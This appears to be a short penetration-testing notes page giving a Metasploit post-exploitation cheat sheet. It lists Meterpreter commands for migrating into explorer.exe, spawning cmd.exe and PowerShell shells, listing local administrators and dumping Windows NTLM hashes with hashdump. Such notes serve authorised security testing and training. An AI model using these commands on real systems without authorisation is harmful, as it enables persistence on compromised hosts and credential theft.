search

Metasploit

hashtag
Post Exploitation Workflow

getuid
sysinfo
ps -S explorer.exe #Get the process list with filter "explorer.exe"
migrate <pid> #Migrate the session to process
shell #Spawn a cmd.exe process

hashtag
Check group members

net localgroup adminstrators

hashtag
Load Powershell Extension

Spawn a powershell.exe in your meterpreter session, just like running shell command to spawn cmd.exe in your session

meterpreter> load powershell
meterpreter> powershell_shell

hashtag
Dump windows users NTLM hashes

meterpreter> hashdump

hashtag

PreviousUAC BypassNextPowerShell

Last updated